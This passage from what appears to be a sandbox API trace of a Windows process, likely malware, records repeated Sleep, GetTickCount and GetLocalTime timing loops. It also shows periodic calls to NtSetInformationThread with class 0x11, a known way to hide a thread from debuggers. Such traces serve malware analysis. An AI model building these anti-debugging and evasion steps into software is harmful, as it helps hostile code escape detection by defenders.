wMilliseconds=0x24a)) [0199.772] Sleep (dwMilliseconds=0x3e8) [0199.783] Sleep (dwMilliseconds=0x3e8) [0199.800] Sleep (dwMilliseconds=0x3e8) [0199.812] Sleep (dwMilliseconds=0x3e8) [0199.826] Sleep (dwMilliseconds=0x3e8) [0199.840] Sleep (dwMilliseconds=0x3e8) [0199.855] Sleep (dwMilliseconds=0x3e8) [0199.933] Sleep (dwMilliseconds=0x3e8) [0200.004] Sleep (dwMilliseconds=0x3e8) [0200.043] Sleep (dwMilliseconds=0x3e8) [0200.183] Sleep (dwMilliseconds=0x3e8) [0200.280] Sleep (dwMilliseconds=0x3e8) [0200.371] Sleep (dwMilliseconds=0x3e8) [0200.489] Sleep (dwMilliseconds=0x3e8) [0200.575] Sleep (dwMilliseconds=0x3e8) [0200.668] Sleep (dwMilliseconds=0x3e8) [0200.778] Sleep (dwMilliseconds=0x3e8) [0200.871] Sleep (dwMilliseconds=0x3e8) [0200.990] Sleep (dwMilliseconds=0x3e8) [0201.074] Sleep (dwMilliseconds=0x3e8) [0201.231] Sleep (dwMilliseconds=0x3e8) [0201.404] Sleep (dwMilliseconds=0x3e8) [0201.509] Sleep (dwMilliseconds=0x3e8) [0201.603] Sleep (dwMilliseconds=0x3e8) [0201.696] Sleep (dwMilliseconds=0x3e8) [0201.806] Sleep (dwMilliseconds=0x3e8) [0201.915] Sleep (dwMilliseconds=0x3e8) [0202.009] Sleep (dwMilliseconds=0x3e8) [0202.075] Sleep (dwMilliseconds=0x3e8) [0202.230] Sleep (dwMilliseconds=0x3e8) [0202.318] Sleep (dwMilliseconds=0x3e8) Thread: id = 85 os_tid = 0xd30 [0176.622] GetCurrentThreadId () returned 0xd30 [0176.622] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xc, wMilliseconds=0x1c6)) [0176.623] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0176.624] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0176.624] GetCurrentThread () returned 0xfffffffe [0176.624] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0176.625] GetTickCount () returned 0x1d14077 [0176.625] Sleep (dwMilliseconds=0x3e8) [0177.741] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xd, wMilliseconds=0x242)) [0177.741] GetTickCount () returned 0x1d144cb [0177.741] Sleep (dwMilliseconds=0x3e8) [0178.782] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xe, wMilliseconds=0x26f)) [0178.782] GetTickCount () returned 0x1d148e0 [0178.782] Sleep (dwMilliseconds=0x3e8) [0179.869] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0xf, wMilliseconds=0x2cb)) [0179.869] GetTickCount () returned 0x1d14d24 [0179.869] Sleep (dwMilliseconds=0x3e8) [0180.946] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x10, wMilliseconds=0x317)) [0180.946] GetTickCount () returned 0x1d15159 [0180.946] Sleep (dwMilliseconds=0x3e8) [0182.006] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x11, wMilliseconds=0x354)) [0182.006] GetTickCount () returned 0x1d1557e [0182.006] Sleep (dwMilliseconds=0x3e8) [0183.146] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x12, wMilliseconds=0x3cf)) [0183.146] GetTickCount () returned 0x1d159e1 [0183.147] Sleep (dwMilliseconds=0x3e8) [0184.346] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x14, wMilliseconds=0xb0)) [0184.346] GetTickCount () returned 0x1d15e92 [0184.346] Sleep (dwMilliseconds=0x3e8) [0185.377] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x15, wMilliseconds=0xce)) [0185.377] GetTickCount () returned 0x1d16298 [0185.377] Sleep (dwMilliseconds=0x3e8) [0186.434] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x16, wMilliseconds=0xfb)) [0186.434] GetTickCount () returned 0x1d166ad [0186.434] Sleep (dwMilliseconds=0x3e8) [0187.470] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x128)) [0187.471] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0187.471] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0187.471] GetCurrentThread () returned 0xfffffffe [0187.472] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0187.472] GetTickCount () returned 0x1d16ac2 [0187.472] Sleep (dwMilliseconds=0x3e8) [0188.559] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x18, wMilliseconds=0x184)) [0188.559] GetTickCount () returned 0x1d16f06 [0188.559] Sleep (dwMilliseconds=0x3e8) [0189.621] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x19, wMilliseconds=0x1c1)) [0189.621] GetTickCount () returned 0x1d1732b [0189.622] Sleep (dwMilliseconds=0x3e8) [0190.759] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1a, wMilliseconds=0x24c)) [0190.759] GetTickCount () returned 0x1d1779e [0190.759] Sleep (dwMilliseconds=0x3e8) [0191.788] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1b, wMilliseconds=0x26a)) [0191.788] GetTickCount () returned 0x1d17ba3 [0191.788] Sleep (dwMilliseconds=0x3e8) [0192.820] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x287)) [0192.820] GetTickCount () returned 0x1d17fa9 [0192.820] Sleep (dwMilliseconds=0x3e8) [0193.864] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1d, wMilliseconds=0x2b4)) [0193.864] GetTickCount () returned 0x1d183be [0193.864] Sleep (dwMilliseconds=0x3e8) [0194.880] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1e, wMilliseconds=0x2c2)) [0194.880] GetTickCount () returned 0x1d187b4 [0194.880] Sleep (dwMilliseconds=0x3e8) [0195.930] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1f, wMilliseconds=0x2f0)) [0195.930] GetTickCount () returned 0x1d18bc9 [0195.930] Sleep (dwMilliseconds=0x3e8) [0196.998] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x20, wMilliseconds=0x33c)) [0196.998] GetTickCount () returned 0x1d18ffe [0196.998] Sleep (dwMilliseconds=0x3e8) [0198.055] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x21, wMilliseconds=0x369)) [0198.056] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.057] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.057] GetCurrentThread () returned 0xfffffffe [0198.057] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.057] GetTickCount () returned 0x1d19413 [0198.057] Sleep (dwMilliseconds=0x3e8) [0198.329] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x9a)) [0198.329] GetTickCount () returned 0x1d19913 [0198.329] Sleep (dwMilliseconds=0x3e8) [0198.421] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0xf8)) [0198.421] GetTickCount () returned 0x1d19d57 [0198.421] Sleep (dwMilliseconds=0x3e8) [0198.470] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x126)) [0198.470] GetTickCount () returned 0x1d1a16d [0198.470] Sleep (dwMilliseconds=0x3e8) [0198.484] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x136)) [0198.484] GetTickCount () returned 0x1d1a564 [0198.484] Sleep (dwMilliseconds=0x3e8) [0198.509] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x146)) [0198.509] GetTickCount () returned 0x1d1a95a [0198.509] Sleep (dwMilliseconds=0x3e8) [0198.515] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x155)) [0198.515] GetTickCount () returned 0x1d1ad51 [0198.515] Sleep (dwMilliseconds=0x3e8) [0198.543] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x174)) [0198.543] GetTickCount () returned 0x1d1b157 [0198.543] Sleep (dwMilliseconds=0x3e8) [0198.592] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1a3)) [0198.592] GetTickCount () returned 0x1d1b56d [0198.592] Sleep (dwMilliseconds=0x3e8) [0198.642] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1d9)) [0198.642] GetTickCount () returned 0x1d1b983 [0198.642] Sleep (dwMilliseconds=0x3e8) [0198.652] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1e3)) [0198.653] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.653] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.653] GetCurrentThread () returned 0xfffffffe [0198.653] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.654] GetTickCount () returned 0x1d1bd79 [0198.654] Sleep (dwMilliseconds=0x3e8) [0198.657] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1e8)) [0198.657] GetTickCount () returned 0x1d1c160 [0198.657] Sleep (dwMilliseconds=0x3e8) [0198.669] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1f5)) [0198.670] GetTickCount () returned 0x1d1c557 [0198.670] Sleep (dwMilliseconds=0x3e8) [0198.671] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1f6)) [0198.671] GetTickCount () returned 0x1d1c93e [0198.671] Sleep (dwMilliseconds=0x3e8) [0198.679] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x1fe)) [0198.679] GetTickCount () returned 0x1d1cd25 [0198.679] Sleep (dwMilliseconds=0x3e8) [0198.681] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x200)) [0198.682] GetTickCount () returned 0x1d1d11b [0198.682] Sleep (dwMilliseconds=0x3e8) [0198.684] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x203)) [0198.684] GetTickCount () returned 0x1d1d502 [0198.684] Sleep (dwMilliseconds=0x3e8) [0198.686] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x205)) [0198.686] GetTickCount () returned 0x1d1d8e9 [0198.686] Sleep (dwMilliseconds=0x3e8) [0198.692] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x20b)) [0198.692] GetTickCount () returned 0x1d1dcd0 [0198.692] Sleep (dwMilliseconds=0x3e8) [0198.697] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x210)) [0198.697] GetTickCount () returned 0x1d1e0c7 [0198.697] Sleep (dwMilliseconds=0x3e8) [0198.698] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x211)) [0198.699] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.699] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.699] GetCurrentThread () returned 0xfffffffe [0198.699] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.700] GetTickCount () returned 0x1d1e4ae [0198.700] Sleep (dwMilliseconds=0x3e8) [0198.701] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x214)) [0198.701] GetTickCount () returned 0x1d1e895 [0198.702] Sleep (dwMilliseconds=0x3e8) [0198.706] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x219)) [0198.706] GetTickCount () returned 0x1d1ec7c [0198.706] Sleep (dwMilliseconds=0x3e8) [0198.708] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x21b)) [0198.708] GetTickCount () returned 0x1d1f063 [0198.708] Sleep (dwMilliseconds=0x3e8) [0198.709] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x21c)) [0198.709] GetTickCount () returned 0x1d1f44a [0198.709] Sleep (dwMilliseconds=0x3e8) [0198.711] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x21e)) [0198.711] GetTickCount () returned 0x1d1f841 [0198.711] Sleep (dwMilliseconds=0x3e8) [0198.712] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x21f)) [0198.713] GetTickCount () returned 0x1d1fc28 [0198.713] Sleep (dwMilliseconds=0x3e8) [0198.718] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x225)) [0198.718] GetTickCount () returned 0x1d2000f [0198.718] Sleep (dwMilliseconds=0x3e8) [0198.722] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x229)) [0198.722] GetTickCount () returned 0x1d203f6 [0198.722] Sleep (dwMilliseconds=0x3e8) [0198.724] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x22b)) [0198.724] GetTickCount () returned 0x1d207dd [0198.724] Sleep (dwMilliseconds=0x3e8) [0198.730] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x231)) [0198.731] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.731] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.731] GetCurrentThread () returned 0xfffffffe [0198.731] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.732] GetTickCount () returned 0x1d20bd3 [0198.732] Sleep (dwMilliseconds=0x3e8) [0198.734] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x235)) [0198.734] GetTickCount () returned 0x1d20fba [0198.734] Sleep (dwMilliseconds=0x3e8) [0198.739] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x23a)) [0198.739] GetTickCount () returned 0x1d213a1 [0198.740] Sleep (dwMilliseconds=0x3e8) [0198.741] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x23c)) [0198.741] GetTickCount () returned 0x1d21788 [0198.741] Sleep (dwMilliseconds=0x3e8) [0198.743] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x23e)) [0198.743] GetTickCount () returned 0x1d21b7f [0198.743] Sleep (dwMilliseconds=0x3e8) [0198.747] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x242)) [0198.747] GetTickCount () returned 0x1d21f66 [0198.747] Sleep (dwMilliseconds=0x3e8) [0198.749] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x244)) [0198.749] GetTickCount () returned 0x1d2234d [0198.749] Sleep (dwMilliseconds=0x3e8) [0198.751] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x246)) [0198.751] GetTickCount () returned 0x1d22734 [0198.752] Sleep (dwMilliseconds=0x3e8) [0198.760] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x24f)) [0198.760] GetTickCount () returned 0x1d22b2a [0198.760] Sleep (dwMilliseconds=0x3e8) [0198.762] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x251)) [0198.762] GetTickCount () returned 0x1d22f11 [0198.762] Sleep (dwMilliseconds=0x3e8) [0198.763] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x252)) [0198.766] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.766] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.766] GetCurrentThread () returned 0xfffffffe [0198.766] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.769] GetTickCount () returned 0x1d232f8 [0198.769] Sleep (dwMilliseconds=0x3e8) [0198.770] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x259)) [0198.771] GetTickCount () returned 0x1d236df [0198.771] Sleep (dwMilliseconds=0x3e8) [0198.772] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x25b)) [0198.772] GetTickCount () returned 0x1d23ac6 [0198.772] Sleep (dwMilliseconds=0x3e8) [0198.775] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x25e)) [0198.775] GetTickCount () returned 0x1d23ebd [0198.775] Sleep (dwMilliseconds=0x3e8) [0198.778] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x261)) [0198.778] GetTickCount () returned 0x1d242a4 [0198.778] Sleep (dwMilliseconds=0x3e8) [0198.780] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x263)) [0198.780] GetTickCount () returned 0x1d2468b [0198.780] Sleep (dwMilliseconds=0x3e8) [0198.781] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x264)) [0198.782] GetTickCount () returned 0x1d24a72 [0198.782] Sleep (dwMilliseconds=0x3e8) [0198.789] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x26c)) [0198.789] GetTickCount () returned 0x1d24e69 [0198.789] Sleep (dwMilliseconds=0x3e8) [0198.790] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x26d)) [0198.791] GetTickCount () returned 0x1d25250 [0198.791] Sleep (dwMilliseconds=0x3e8) [0198.792] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x26f)) [0198.792] GetTickCount 